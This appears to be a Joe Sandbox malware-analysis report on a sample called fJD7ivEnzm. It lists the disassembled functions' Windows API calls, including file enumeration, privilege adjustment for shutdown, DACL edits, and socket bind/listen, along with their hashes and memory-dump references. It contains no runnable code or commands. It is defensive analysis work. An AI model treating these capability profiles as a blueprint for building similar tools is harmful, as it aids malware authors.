                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 999945258-2428617273
                                                                          • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                          • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                          • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                          • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                          • __wsplitpath.LIBCMT ref: 00403492
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • _wcscpy.LIBCMT ref: 004034A7
                                                                          • _wcscat.LIBCMT ref: 004034BC
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                          • _wcscpy.LIBCMT ref: 004035A0
                                                                          • _wcslen.LIBCMT ref: 00403623
                                                                          • _wcslen.LIBCMT ref: 0040367D
                                                                          Strings
                                                                          • _, xrefs: 0040371C
                                                                          • Error opening the file, xrefs: 00428231
                                                                          • Unterminated string, xrefs: 00428348
                                                                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                          • API String ID: 3393021363-188983378
                                                                          • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                          • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                          • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                          • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                          • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                          • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                          • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                          • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 1409584000-438819550
                                                                          • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                          • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                          • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                          • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                          • __swprintf.LIBCMT ref: 00431C2E
                                                                          • _wcslen.LIBCMT ref: 00431C3A
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 2192556992-3457252023
                                                                          • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                          • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                          • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                          • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                          APIs
                                                                          • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                          • __swprintf.LIBCMT ref: 004722B9
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPath$LocalTime__swprintf
                                                                          • String ID: %.3d
                                                                          • API String ID: 3337348382-986655627
                                                                          • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                          • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                          • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                          • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                          • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                          • FindClose.KERNEL32(00000000), ref: 00442930
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                          • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                            • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                          • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*
                                                                          • API String ID: 2640511053-438819550
                                                                          • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                          • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                          • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                          • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                          • GetLastError.KERNEL32 ref: 00433414
                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 2938487562-3733053543
                                                                          • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                          • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                          • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                          • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                          APIs
                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                            • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                            • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                          • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                          • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                          • String ID:
                                                                          • API String ID: 1255039815-0
                                                                          • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                          • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                          • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                          • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                          APIs
                                                                          • __swprintf.LIBCMT ref: 00433073
                                                                          • __swprintf.LIBCMT ref: 00433085
                                                                          • __wcsicoll.LIBCMT ref: 00433092
                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                          • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                          • LockResource.KERNEL32(?), ref: 00433120
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                          • String ID:
                                                                          • API String ID: 1158019794-0
                                                                          • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                          • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                          • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                          • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                          • String ID:
                                                                          • API String ID: 1737998785-0
                                                                          • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                          • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                          • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                          • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                          • GetLastError.KERNEL32 ref: 0045D6BF
                                                                          • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                          • API String ID: 4194297153-14809454
                                                                          • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                          • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                          • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                          • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_strncmp
                                                                          • String ID: @oH$\$^$h
                                                                          • API String ID: 2175499884-3701065813
                                                                          • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                                          • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                                          • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                                          • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                          • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                          • String ID:
                                                                          • API String ID: 540024437-0
                                                                          • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                          • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                          • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                          • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
